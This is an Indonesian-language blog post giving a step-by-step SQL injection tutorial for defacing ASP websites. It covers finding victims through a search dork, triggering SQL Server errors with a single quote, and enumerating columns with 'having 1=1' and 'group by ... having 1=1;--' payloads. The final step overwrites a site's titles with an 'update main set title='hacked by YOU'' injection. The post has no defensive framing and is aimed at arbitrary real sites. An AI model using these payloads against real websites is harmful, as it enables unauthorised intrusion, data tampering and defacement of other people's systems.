Kita akan mempelajari ASP
Tutorial aja deh langsyungz.................
1. Cari target dulu dengan dork: inurl:default.asp?newsID=
2. Misalnya dapet target www.situs.com/default.asp?newsID=123
3. Tambain ' (single quote) dibelakang angka, akan keluar seperti ini:
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′4. Jika keluar kata-kata diatas, maka, kita tambahin ini untuk mencari bugnya: having 1=1 . jadinya begini: www.situs.com/default.asp?newsID=123 having 1=1 maka keluarnya adalah:
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ” 之前有未闭合的引号
/new_show.asp,行 89
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′5. Ketemu columnnya kan? ntuh dia si main.id
[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.id’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/new_show.asp,行 89
6. Masukin dibelakangnya: group by "column-nya" having 1=1;– Columnnya diganti column yg diatas itu, dalam kasus ini, columnnya main.id jadi begini: www.situs.com/default.asp?newsID=123 group by main.id having 1=1;– maka keluarnya adalah:
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′7. Ketemu titlenya... hehehehe.... (yang 'main.title')
[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.title’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/new_show.asp,行 89
8. Langsung aja Update dengan menambahkan: update main set title=’hacked by YOU’ jadinya, URLnya begini: www.situs.com/default.asp?newsID=123 update main set title='hacked by YOU' dan liat halaman utamanya.........
Sekian....
---END---
Thanks to: anak|jendral, Jo2, Hmei7, SATANIC_H4XOR
Tidak ada komentar:
Posting Komentar
Silahkan kasih komentar kepada saya, walaupun bagus, jelek, saya akan menerimanya, dan mengoreksinya... Kan gak ada yang sempurna kan? :D